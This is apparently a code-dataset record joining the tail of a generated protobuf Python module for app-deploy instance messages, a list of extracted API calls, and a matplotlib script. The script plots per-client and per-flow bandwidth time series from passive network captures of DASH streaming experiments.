      name='deviceIp', full_name='business.GetAppDeployInstanceResponse.List.deviceIp', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='installPath', full_name='business.GetAppDeployInstanceResponse.List.installPath', index=5,
      number=6, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='appId', full_name='business.GetAppDeployInstanceResponse.List.appId', index=6,
      number=7, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=183,
  serialized_end=319,
)
# Descriptor for message business.GetAppDeployInstanceResponse
# (repeated List field).
_GETAPPDEPLOYINSTANCERESPONSE = _descriptor.Descriptor(
  name='GetAppDeployInstanceResponse',
  full_name='business.GetAppDeployInstanceResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='list', full_name='business.GetAppDeployInstanceResponse.list', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[_GETAPPDEPLOYINSTANCERESPONSE_LIST, ],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=91,
  serialized_end=319,
)
# Descriptor for message business.GetAppDeployInstanceResponseWrapper
# (envelope with code/codeExplain/error around the response payload).
_GETAPPDEPLOYINSTANCERESPONSEWRAPPER = _descriptor.Descriptor(
  name='GetAppDeployInstanceResponseWrapper',
  full_name='business.GetAppDeployInstanceResponseWrapper',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='code', full_name='business.GetAppDeployInstanceResponseWrapper.code', index=0,
      number=1, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='codeExplain', full_name='business.GetAppDeployInstanceResponseWrapper.codeExplain', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='error', full_name='business.GetAppDeployInstanceResponseWrapper.error', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='data', full_name='business.GetAppDeployInstanceResponseWrapper.data', index=3,
      number=4, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=322,
  serialized_end=463,
)
# Wire up cross-references between descriptors and register them with
# the default symbol database.
_GETAPPDEPLOYINSTANCERESPONSE_LIST.containing_type = _GETAPPDEPLOYINSTANCERESPONSE
_GETAPPDEPLOYINSTANCERESPONSE.fields_by_name['list'].message_type = _GETAPPDEPLOYINSTANCERESPONSE_LIST
_GETAPPDEPLOYINSTANCERESPONSEWRAPPER.fields_by_name['data'].message_type = _GETAPPDEPLOYINSTANCERESPONSE
DESCRIPTOR.message_types_by_name['GetAppDeployInstanceRequest'] = _GETAPPDEPLOYINSTANCEREQUEST
DESCRIPTOR.message_types_by_name['GetAppDeployInstanceResponse'] = _GETAPPDEPLOYINSTANCERESPONSE
DESCRIPTOR.message_types_by_name['GetAppDeployInstanceResponseWrapper'] = _GETAPPDEPLOYINSTANCERESPONSEWRAPPER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# Concrete message classes generated via the reflection metaclass.
GetAppDeployInstanceRequest = _reflection.GeneratedProtocolMessageType('GetAppDeployInstanceRequest', (_message.Message,), {
  'DESCRIPTOR' : _GETAPPDEPLOYINSTANCEREQUEST,
  '__module__' : 'get_app_deploy_instance_pb2'
  # @@protoc_insertion_point(class_scope:business.GetAppDeployInstanceRequest)
  })
_sym_db.RegisterMessage(GetAppDeployInstanceRequest)
GetAppDeployInstanceResponse = _reflection.GeneratedProtocolMessageType('GetAppDeployInstanceResponse', (_message.Message,), {
  'List' : _reflection.GeneratedProtocolMessageType('List', (_message.Message,), {
    'DESCRIPTOR' : _GETAPPDEPLOYINSTANCERESPONSE_LIST,
    '__module__' : 'get_app_deploy_instance_pb2'
    # @@protoc_insertion_point(class_scope:business.GetAppDeployInstanceResponse.List)
    })
  ,
  'DESCRIPTOR' : _GETAPPDEPLOYINSTANCERESPONSE,
  '__module__' : 'get_app_deploy_instance_pb2'
  # @@protoc_insertion_point(class_scope:business.GetAppDeployInstanceResponse)
  })
_sym_db.RegisterMessage(GetAppDeployInstanceResponse)
_sym_db.RegisterMessage(GetAppDeployInstanceResponse.List)
GetAppDeployInstanceResponseWrapper = _reflection.GeneratedProtocolMessageType('GetAppDeployInstanceResponseWrapper', (_message.Message,), {
  'DESCRIPTOR' : _GETAPPDEPLOYINSTANCERESPONSEWRAPPER,
  '__module__' : 'get_app_deploy_instance_pb2'
  # @@protoc_insertion_point(class_scope:business.GetAppDeployInstanceResponseWrapper)
  })
_sym_db.RegisterMessage(GetAppDeployInstanceResponseWrapper)
# @@protoc_insertion_point(module_scope)
|
[
"google.protobuf.symbol_database.Default",
"google.protobuf.descriptor.FieldDescriptor",
"google.protobuf.reflection.GeneratedProtocolMessageType"
] |
[((477, 503), 'google.protobuf.symbol_database.Default', '_symbol_database.Default', ([], {}), '()\n', (501, 503), True, 'from google.protobuf import symbol_database as _symbol_database\n'), ((9146, 9338), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""GetAppDeployInstanceRequest"""', '(_message.Message,)', "{'DESCRIPTOR': _GETAPPDEPLOYINSTANCEREQUEST, '__module__':\n 'get_app_deploy_instance_pb2'}"], {}), "('GetAppDeployInstanceRequest', (\n _message.Message,), {'DESCRIPTOR': _GETAPPDEPLOYINSTANCEREQUEST,\n '__module__': 'get_app_deploy_instance_pb2'})\n", (9186, 9338), True, 'from google.protobuf import reflection as _reflection\n'), ((10218, 10429), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""GetAppDeployInstanceResponseWrapper"""', '(_message.Message,)', "{'DESCRIPTOR': _GETAPPDEPLOYINSTANCERESPONSEWRAPPER, '__module__':\n 'get_app_deploy_instance_pb2'}"], {}), "('GetAppDeployInstanceResponseWrapper',\n (_message.Message,), {'DESCRIPTOR':\n _GETAPPDEPLOYINSTANCERESPONSEWRAPPER, '__module__':\n 'get_app_deploy_instance_pb2'})\n", (10258, 10429), True, 'from google.protobuf import reflection as _reflection\n'), ((9612, 9787), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""List"""', '(_message.Message,)', "{'DESCRIPTOR': _GETAPPDEPLOYINSTANCERESPONSE_LIST, '__module__':\n 'get_app_deploy_instance_pb2'}"], {}), "('List', (_message.Message,), {\n 'DESCRIPTOR': _GETAPPDEPLOYINSTANCERESPONSE_LIST, '__module__':\n 'get_app_deploy_instance_pb2'})\n", (9652, 9787), True, 'from google.protobuf import reflection as _reflection\n'), ((5820, 6169), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""list"""', 'full_name': '"""business.GetAppDeployInstanceResponse.list"""', 'index': '(0)', 'number': '(1)', 'type': '(11)', 'cpp_type': '(10)', 
'label': '(3)', 'has_default_value': '(False)', 'default_value': '[]', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='list', full_name=\n 'business.GetAppDeployInstanceResponse.list', index=0, number=1, type=\n 11, cpp_type=10, label=3, has_default_value=False, default_value=[],\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR)\n", (5847, 6169), True, 'from google.protobuf import descriptor as _descriptor\n'), ((6690, 7042), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""code"""', 'full_name': '"""business.GetAppDeployInstanceResponseWrapper.code"""', 'index': '(0)', 'number': '(1)', 'type': '(5)', 'cpp_type': '(1)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='code', full_name=\n 'business.GetAppDeployInstanceResponseWrapper.code', index=0, number=1,\n type=5, cpp_type=1, label=1, has_default_value=False, default_value=0,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR)\n", (6717, 7042), True, 'from google.protobuf import descriptor as _descriptor\n'), ((7879, 8241), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""data"""', 'full_name': '"""business.GetAppDeployInstanceResponseWrapper.data"""', 'index': '(3)', 'number': '(4)', 'type': '(11)', 'cpp_type': '(10)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': 'None', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 
'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='data', full_name=\n 'business.GetAppDeployInstanceResponseWrapper.data', index=3, number=4,\n type=11, cpp_type=10, label=1, has_default_value=False, default_value=\n None, message_type=None, enum_type=None, containing_type=None,\n is_extension=False, extension_scope=None, serialized_options=None, file\n =DESCRIPTOR)\n", (7906, 8241), True, 'from google.protobuf import descriptor as _descriptor\n')]
|
import matplotlib.pyplot as plt
import matplotlib.dates as md
import matplotlib as mpl
import datetime
import numpy as np
from matplotlib.backends.backend_pdf import PdfPages
import numpy as np
import sys
import errno
import os
from collections import OrderedDict
import math
from readcsv import readbandwidthvalues_self_timeplot, readbandwidthvalues_mim_timeplot, \
readbandwidthvalues_mim_timeplot_usingfixbuckets
# Font sizes (pt) shared by all plots in this module.
_TITLE_SIZE = 14
_TICK_SIZE = 10
_XLABEL_SIZE = 14
_YLABEL_SIZE = 14
# Vertical legend offset used for 10-line legends.
_LEGENDYPOS_10LINE = 2.05
# Aggregation bucket widths in seconds (per-client vs per-port plots).
_BUCKETSIZE_SEC = 0.5
_BUCKETSIZE_SEC_PORTS = 1
# One color per plotted client line; the palette repeats so indexing by
# client rank never runs out for the expected client counts.
_TIMEPLOT_COLORS=['#F8B195', "#355C7D", '#C06C84', '#F67280', '#99B898', '#A8E6CE', '#E84A5F', '#A7226E',
                  '#F7DB4F', "#FC913A", "#1bdc9d", "#9c5a4c", "#9c4c84", "#4c999c", '#F8B195', "#355C7D",
                  '#C06C84', '#F67280', '#99B898', '#A8E6CE', '#F8B195', "#355C7D", '#C06C84', '#F67280',
                  '#99B898', '#A8E6CE', '#F8B195', "#355C7D", '#C06C84', '#F67280', '#99B898', '#A8E6CE',
                  '#F8B195', "#355C7D", '#C06C84', '#F67280', '#99B898', '#A8E6CE']
# Fixed color per DASH fragment quality class.
_FRAGMENTQUALITY_COLORS={"index":"#e48873", "audio":'#21409a', "low":"#f44546", "mid":'#e68a00', "high":"#039c4b"}
# One distinct matplotlib marker per plotted client line.
_TIMEPLOT_MARKERS = [".", "o", "v", "^", "<", ">", "1", "2", "3", "4", "8", "s", "p", "P", "*", "h", "H",
                     "+", "x", "X", "D", "d", "|", "_", 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]
def getclientnumberlist(config_parser, section, conntype):
    """Return the configured passive client counts for *conntype* as a list.

    Reads option "clientnumber_passive<conntype>" from *section* and
    splits its comma-separated value.
    """
    raw = config_parser.get(section, "clientnumber_passive" + conntype)
    return raw.split(",")
def getdashfilelist(config_parser, section):
    """Return the configured DASH file names as a list.

    Splits the comma-separated "dashfiles" option of *section*.
    """
    raw = config_parser.get(section, "dashfiles")
    return raw.split(",")
def getnoiselist(config_parser, section):
    """Return the configured noise levels as a list.

    Splits the comma-separated "noise" option of *section*.
    """
    raw = config_parser.get(section, "noise")
    return raw.split(",")
def createfolder(directoryname):
    """Create *directoryname* (including parents); ignore if it exists.

    On any OSError other than EEXIST the error is printed and the process
    exits with a non-zero status.
    """
    try:
        os.makedirs(directoryname)
    except OSError as error:
        if error.errno != errno.EEXIST:
            print(error)
            # BUG FIX: exit with a failure status (was sys.exit(0), which
            # signalled success to the caller despite the error).
            sys.exit(1)
def passivetimeseries_createplot(plottitle, nclient):
    """Create the per-client passive time-series figure.

    Args:
        plottitle: base title; the current timestamp is appended.
        nclient: number of client rows, used to scale the figure height.

    Returns:
        The configured matplotlib ``pyplot`` module, ready for plotting.
    """
    fig = plt.figure(figsize=(15, 0.6 * nclient))
    ax = plt.gca()
    ax.tick_params(axis="both", labelsize=_TICK_SIZE)
    ax.set_xlabel("Time", fontsize=_XLABEL_SIZE)
    # BUG FIX: the label previously read "Bandwidth ()Mbps)".
    ax.set_ylabel("Bandwidth (Mbps)", fontsize=_YLABEL_SIZE)
    plt.title(plottitle + "___" + str(datetime.datetime.now()))
    print("plotting " + plottitle + "___" + str(datetime.datetime.now()) + "...")
    plt.gcf().autofmt_xdate()
    formatter = "%H:%M:%S"
    xfmt = md.DateFormatter(formatter)
    ax.xaxis.set_major_formatter(xfmt)
    return plt
def passivetimeseries_plot(plt, results, title, folderpath):
    """Plot one marker row per client showing when samples were observed.

    Args:
        plt: the prepared pyplot module from passivetimeseries_createplot.
        results: mapping of client IP -> list of sample dicts carrying a
            "timestamp" key.
        title: output file base name.
        folderpath: output directory (created if missing); the figure is
            written there as both PDF and PNG.
    """
    tick_positions = []
    tick_labels = []
    for row, (clientIP, clientresults) in enumerate(results.items()):
        # Every sample of this client is drawn at the same y position.
        xs = [sample["timestamp"] for sample in clientresults]
        ys = [row] * len(xs)
        plt.plot(xs, ys, marker=_TIMEPLOT_MARKERS[row], linestyle="None",
                 label=clientIP, color=_TIMEPLOT_COLORS[row])
        tick_labels.append(clientIP)
        tick_positions.append(row)
    plt.yticks(tick_positions, tick_labels)
    createfolder(folderpath)
    pdfpage = PdfPages(folderpath + title + ".pdf")
    pdfpage.savefig( bbox_inches="tight")
    pdfpage.close()
    plt.savefig(folderpath + title + ".png", bbox_inches="tight")
    plt.close()
def passivetimeseries(config_parser, section, mode, direction, connectiontype, ylim, server, ncol,
                      legendypos, logger): #edgeserver=edge/cloud
    """Render arrival-time plots for every configured experiment variant.

    Iterates over all (clientnumber, noise, dashfile) combinations of the
    config *section*, reads the matching sorted passive CSV and plots it.

    Args:
        config_parser: ConfigParser holding the experiment settings.
        section: config section name.
        mode: "self" or "mim" — selects the CSV reader.
        direction / connectiontype / server: strings used to build titles
            and input file names.
        ylim, ncol, legendypos: kept for interface compatibility (unused
            in this plot variant).
        logger: logger for debug/error output.
    """
    clientnumberlist = getclientnumberlist(config_parser=config_parser, section=section, conntype=connectiontype)
    dashfileslist = getdashfilelist(config_parser=config_parser, section=section)
    noiselist = getnoiselist(config_parser=config_parser, section=section)
    logger.debug("clientnumberlist" + str(clientnumberlist))
    logger.debug("dashfileslist" + str(dashfileslist))
    logger.debug("noiselist" + str(noiselist))
    logger.debug("mode = " + mode)
    for clientnumber in clientnumberlist:
        for noise in noiselist:
            for dashfile in dashfileslist:
                # Build the plot title and the sorted-CSV input path from
                # the experiment parameters.
                title = str(mode) + "-" + str(direction) + "-" + str(dashfile) + str(clientnumber) + "-"
                title += str(noise) + "-" + str(server) + "_plot1"
                filename = "csv/passive/sorted/" + mode + "-bandwidth-" + direction + "-" + connectiontype + "-"
                filename += str(clientnumber) + "clients-" + dashfile + "-noise" + noise + "_"
                filename += config_parser.get(section, "from_passive") + "-"
                filename += config_parser.get(section, "to_passive") + "_SORTED.csv"
                folderpath = "time/bandwidth/" + str(connectiontype) + "/"
                plt = passivetimeseries_createplot(plottitle=title, nclient=int(clientnumber))
                if mode == "self":
                    ret = readbandwidthvalues_self_timeplot(config_parser=config_parser, section=section,
                                                            inputfile=filename, segment=server,
                                                            conntype=connectiontype, logger=logger)
                elif mode == "mim":
                    ret = readbandwidthvalues_mim_timeplot(config_parser=config_parser, section=section,
                                                           inputfile=filename, segment=server,
                                                           conntype=connectiontype, logger=logger)
                else:
                    print("unknown mode " + mode)
                    print("exiting")
                    logger.error("unknown mode " + mode)
                    logger.error("exiting")
                    # BUG FIX: exit non-zero on a configuration error
                    # (was sys.exit(0), signalling success).
                    sys.exit(1)
                passivetimeseries_plot(plt=plt, results=ret, title=title, folderpath=folderpath)
def passivetimeseries_usingbandwidth_createplot(colsnumber, rowsnumber, plottitle):
    """Create a subplot grid for per-client bandwidth time series.

    Returns:
        (plt, ax, xfmt): the pyplot module, the 2-D axes array
        (squeeze=False guarantees 2-D) and an HH:MM:SS x-axis date
        formatter for the caller to install.
    """
    fig, ax = plt.subplots(ncols=colsnumber, nrows=rowsnumber, squeeze=False)
    fig.set_size_inches(8.3 * colsnumber, 1.6 * rowsnumber + 0.5)
    plt.title(plottitle + "___" + str(datetime.datetime.now()), fontsize=_TITLE_SIZE)
    plt.gcf().autofmt_xdate()
    xfmt = md.DateFormatter("%H:%M:%S")
    return plt, ax, xfmt
def passivetimeseries_usingbandwidth_plot(results, title, folderpath, ylim, title2="", plotfragmentquality=False):
    """Plot per-client bandwidth time series and save them as PDF + PNG.

    Args:
        results: mapping of client IP -> list of sample dicts with at
            least "timestamp" and "bandwidthMbps" (plus "fragmentquality"
            when *plotfragmentquality* is True).
        title: base plot title / output file name.
        folderpath: output directory (created if missing).
        ylim: upper bandwidth limit (Mbps) for the y axis.
        title2: optional suffix appended to each subplot title.
        plotfragmentquality: when True, one figure per client is produced
            with one subplot per fragment quality; otherwise a single
            figure with one subplot per client.
    """
    time_min = None
    time_max = None
    k = 0
    if not plotfragmentquality:
        plt, ax, xfmt = passivetimeseries_usingbandwidth_createplot(colsnumber=1, plottitle=title,
                                                                    rowsnumber=len(results))
    clientrank = 0
    for clientIP, clientresults in results.items():
        clientrank += 1
        if not plotfragmentquality:
            times = []
            bandwidths = []
        else:
            times = {"index":[], "audio":[], "low":[], "mid":[], "high":[]}
            bandwidths = {"index":[], "audio":[], "low":[], "mid":[], "high":[]}
        for elem in clientresults:
            if not plotfragmentquality:
                times.append(elem["timestamp"])
                bandwidths.append(elem["bandwidthMbps"])
            else:
                fragment_quality = elem["fragmentquality"]
                times[fragment_quality].append(elem["timestamp"])
                bandwidths[fragment_quality].append(elem["bandwidthMbps"])
            # Track the global time range across all clients.
            if time_min == None:
                time_min = elem["timestamp"]
                time_max = elem["timestamp"]
            if time_min > elem["timestamp"]:
                # BUG FIX: was "timemin = ...", a typo that created an
                # unused variable and never lowered time_min.
                time_min = elem["timestamp"]
            if time_max < elem["timestamp"]:
                time_max = elem["timestamp"]
        if len(times) != 0:
            # NOTE(review): title2 is re-prefixed with "_" on every client
            # iteration, so later subplots accumulate underscores — kept
            # as-is to preserve the existing output labels.
            if title2 != "":
                title2 = "_" + title2
            if not plotfragmentquality:
                ax[k, 0].grid(False)
                ax[k, 0].tick_params(axis="both", labelsize=_TICK_SIZE)
                ax[k, 0].set_xlabel("t", fontsize=_XLABEL_SIZE)
                ax[k, 0].set_ylabel("Mbps", fontsize=_YLABEL_SIZE)
                ax[k, 0].set_ylim(0, ylim)
                ax[k, 0].set_xlim(time_min, time_max)
                ax[k, 0].xaxis.set_major_formatter(xfmt)
                ax[k, 0].set_title("client " + str(k + 1) + " with IP = " + clientIP + title2, fontsize=_TITLE_SIZE)
                ax[k, 0].plot(times, bandwidths, marker=_TIMEPLOT_MARKERS[k], markersize=3,
                              label=clientIP, color=_TIMEPLOT_COLORS[k], linestyle="None")
                k += 1
            else:
                # One dedicated figure per client, one subplot per
                # fragment quality ("index" samples are skipped).
                k = 0
                plt, ax, xfmt = passivetimeseries_usingbandwidth_createplot(colsnumber=1, plottitle=title+clientIP,
                                                                            rowsnumber=4)
                for key, value in times.items():
                    if key == "index":
                        continue
                    print ("Plotting")
                    print (key)
                    ax[k, 0].grid(axis="y", color="#dedddc")
                    ax[k, 0].tick_params(axis="both", labelsize=_TICK_SIZE)
                    ax[k, 0].set_xlabel("t", fontsize=_XLABEL_SIZE)
                    ax[k, 0].set_ylabel("Mbps", fontsize=_YLABEL_SIZE)
                    ax[k, 0].set_ylim(0, ylim)
                    ax[k, 0].set_xlim(time_min, time_max)
                    ax[k, 0].xaxis.set_major_formatter(xfmt)
                    ax[k, 0].set_title("client " + str(clientrank) + " with fragment quality = " + str(key) , fontsize=_TITLE_SIZE)
                    ax[k, 0].plot(times[key], bandwidths[key], marker=_TIMEPLOT_MARKERS[k], markersize=1,
                                  label=clientIP, color=_FRAGMENTQUALITY_COLORS[key], linestyle="None")
                    k += 1
                createfolder(folderpath)
                plt.tight_layout()
                pdfpage = PdfPages(folderpath + title + "-" + str(clientrank) + ".pdf")
                pdfpage.savefig( bbox_inches="tight")
                pdfpage.close()
                plt.savefig(folderpath + title + "-" + str(clientrank) + ".png", bbox_inches="tight")
                plt.close()
    createfolder(folderpath)
    if not plotfragmentquality:
        plt.tight_layout()
        pdfpage = PdfPages(folderpath + title + ".pdf")
        pdfpage.savefig( bbox_inches="tight")
        pdfpage.close()
        plt.savefig(folderpath + title + ".png", bbox_inches="tight")
        plt.close()
    return
def passivetimeseries_usingbandwidthseparatedflows_plot(results, title, folderpath, ylim, title2=""):
    """Plot per-flow (per client port) bandwidth time series, one figure per client.

    For every client IP in *results* the samples are grouped by client port
    (one TCP flow per port) and each flow gets its own subplot in a
    two-column grid.  Each client's figure is saved as both PDF and PNG
    under *folderpath* with a per-client numeric suffix.

    Args:
        results: mapping clientIP -> list of sample dicts with keys
            "clientPort", "timestamp" and "bandwidthMbps".
        title: base string used for plot titles and output file names.
        folderpath: output directory (created by createfolder if missing).
        ylim: upper y-axis limit in Mbps.
        title2: optional extra suffix appended to each subplot title.

    Fixes over the previous version:
        * the running minimum timestamp was assigned to a typo'd name
          ("timemin"), so time_min was never lowered after the first sample;
        * title2 was re-prefixed with "_" once per subplot, accumulating
          underscores; the prefix is now computed exactly once.
    """
    # Normalize the optional title suffix once, outside all loops.
    if title2 != "":
        title2 = "_" + title2
    time_min = None
    time_max = None
    clientnum = 1
    for clientIP, clientresults in results.items():
        # Group samples per client port, keeping first-seen order so the
        # subplot layout is deterministic.
        times = OrderedDict()
        bandwidths = OrderedDict()
        for elem in clientresults:
            if elem["clientPort"] not in times:
                times[elem["clientPort"]] = []
                bandwidths[elem["clientPort"]] = []
            times[elem["clientPort"]].append(elem["timestamp"])
            bandwidths[elem["clientPort"]].append(elem["bandwidthMbps"])
            # Track the global time range so all subplots share one x axis.
            if time_min is None:
                time_min = elem["timestamp"]
                time_max = elem["timestamp"]
            if time_min > elem["timestamp"]:
                time_min = elem["timestamp"]
            if time_max < elem["timestamp"]:
                time_max = elem["timestamp"]
        colsnum = 2
        rowsnumber = int(math.ceil(1.0 * len(times) / colsnum))
        plt, ax, xfmt = passivetimeseries_usingbandwidth_createplot(colsnumber=colsnum, plottitle=title,
                                                                    rowsnumber=rowsnumber)
        x = 0
        y = 0
        counter = 1
        print("columns: " + str(colsnum) + ", rows: " + str(rowsnumber))
        for key in times:  # one subplot per flow
            print("plot[" + str(x) + ", " + str(y) + "]")
            if len(times[key]) != 0:
                ax[x, y].tick_params(axis="both", labelsize=_TICK_SIZE)
                ax[x, y].set_xlabel("t", fontsize=_XLABEL_SIZE)
                ax[x, y].set_ylabel("Mbps", fontsize=_YLABEL_SIZE)
                ax[x, y].set_ylim(0, ylim)
                ax[x, y].set_xlim(time_min, time_max)
                ax[x, y].set_title(str(counter) + " of " + str(len(times)) + " with IP = " + clientIP +
                                   " and port = " + str(key) + title2, fontsize=_TITLE_SIZE)
                ax[x, y].xaxis.set_major_formatter(xfmt)
                ax[x, y].plot(times[key], bandwidths[key], marker=_TIMEPLOT_MARKERS[x + y], markersize=3,
                              color=_TIMEPLOT_COLORS[x + y], linestyle="None")
            # Fill the grid column-major: walk down the rows, then move to
            # the next column.
            x += 1
            counter += 1
            if x == rowsnumber:
                x = 0
                y += 1
        print(counter)
        plotsnum = rowsnumber * colsnum
        if counter <= plotsnum:
            # Delete the trailing unused axes so the figure has no empty plots.
            while True:
                print("delete plot[" + str(x) + ", " + str(y) + "]")
                plt.delaxes(ax[x, y])
                x += 1
                counter += 1
                if x == rowsnumber:
                    x = 0
                    y += 1
                if counter > plotsnum:
                    break
        createfolder(folderpath)
        plt.tight_layout()
        pdfpage = PdfPages(folderpath + title + "-" + str(clientnum) + ".pdf")
        pdfpage.savefig(bbox_inches="tight")
        pdfpage.close()
        plt.savefig(folderpath + title + "-" + str(clientnum) + ".png", bbox_inches="tight")
        clientnum += 1
        plt.close()
    return
def passivetimeseries_usingbandwidth(config_parser, section, mode, direction, connectiontype, ylim, server, ncol,
                                     legendypos, logger, bucketsize_microsec=None): #edgeserver=edge/cloud
    """Drive the bandwidth time-series plotting for every configured experiment.

    Iterates over each (clientnumber, noise, dashfile) combination described
    in the config *section*, reads the matching sorted passive-capture CSV
    and renders the bandwidth-over-time plots via
    passivetimeseries_usingbandwidth_plot (plus, when enabled, the
    fragment-quality and per-flow variants).

    Args:
        config_parser: ConfigParser holding the experiment description.
        section: name of the config section to read from.
        mode: "self" or "mim" (asserted); selects which CSV reader is used.
        direction: must be "downlink" (asserted).
        connectiontype: connection type used in file and folder names.
        ylim: upper y-axis limit forwarded to the plot functions.
        server: "edge" or "cloud" (asserted); which capture segment to read.
        ncol, legendypos: not used in this function -- presumably kept for
            signature parity with sibling plot drivers (TODO confirm).
        logger: logger for debug output.
        bucketsize_microsec: fixed bucket size for the "mim" reader; only
            used when mode == "mim".
    """
    assert mode == "self" or mode == "mim"
    assert direction == "downlink"
    assert server == "edge" or server == "cloud"
    clientnumberlist = getclientnumberlist(config_parser=config_parser, section=section, conntype=connectiontype)
    dashfileslist = getdashfilelist(config_parser=config_parser, section=section)
    noiselist = getnoiselist(config_parser=config_parser, section=section)
    evaluate_fragmentquality=config_parser.getboolean(section, "evaluate_fragmentquality")
    logger.debug("clientnumberlist " + str(clientnumberlist))
    logger.debug("dashfileslist " + str(dashfileslist))
    logger.debug("noiselist " + str(noiselist))
    logger.debug("mode " + mode)
    print("clientnumberlist " + str(clientnumberlist))
    print("dashfileslist " + str(dashfileslist))
    print("noiselist " + str(noiselist))
    print("mode " + mode)
    print("bucket size: " + str(bucketsize_microsec))
    for clientnumber in clientnumberlist:
        for noise in noiselist:
            for dashfile in dashfileslist:
                # Build the output base name and the input CSV path for this
                # (clientnumber, noise, dashfile) combination.
                title = str(mode) + "-" + str(direction) + "-" + str(dashfile) + str(clientnumber) + "-"
                title += str(noise) + "-" + str(server) + "_plot2"
                filename = "csv/passive/sorted/" + mode + "-bandwidth-" + direction + "-" + connectiontype + "-"
                filename += str(clientnumber) + "clients-" + dashfile + "-noise" + noise + "_"
                filename += config_parser.get(section, "from_passive") + "-"
                filename += config_parser.get(section, "to_passive") + "_SORTED.csv"
                folderpath = "time/bandwidth/" + str(connectiontype) + "/"
                if mode == "self":
                    ret = readbandwidthvalues_self_timeplot(config_parser=config_parser, section=section,
                                                            inputfile=filename, segment=server,
                                                            conntype=connectiontype, logger=logger)
                    passivetimeseries_usingbandwidth_plot(results=ret, title=title, folderpath=folderpath, ylim=ylim)
                    if evaluate_fragmentquality:
                        # Extra figure split per DASH fragment quality.
                        passivetimeseries_usingbandwidth_plot(results=ret, title=title + "_fragmentquality", folderpath=folderpath,
                                                              ylim=ylim, plotfragmentquality=True)
                    passivetimeseries_usingbandwidthseparatedflows_plot(results=ret, title=title,
                                                                        folderpath=folderpath, ylim=ylim)
                else:
                    # "mim" mode: samples are aggregated into fixed-size time
                    # buckets; the bucket size in seconds is appended to the title.
                    title2 = "_" + str(1.0 * bucketsize_microsec / 1000000) + "s"
                    ret = readbandwidthvalues_mim_timeplot_usingfixbuckets(config_parser=config_parser,
                                                                           section=section, inputfile=filename, segment=server,
                                                                           conntype=connectiontype, logger=logger,
                                                                           bucketsize_microsec=bucketsize_microsec)
                    #plt, ax, xfmt = passivetimeseries_usingbandwidth_createplot(colsnumber=1,
                    #        plottitle=title + "_" + str(1.0 * bucketsize_microsec / 1000000) + "s",
                    #        rowsnumber=len(ret))
                    passivetimeseries_usingbandwidth_plot(results=ret, title=title,
                                                          folderpath=folderpath, ylim=ylim, title2=title2)
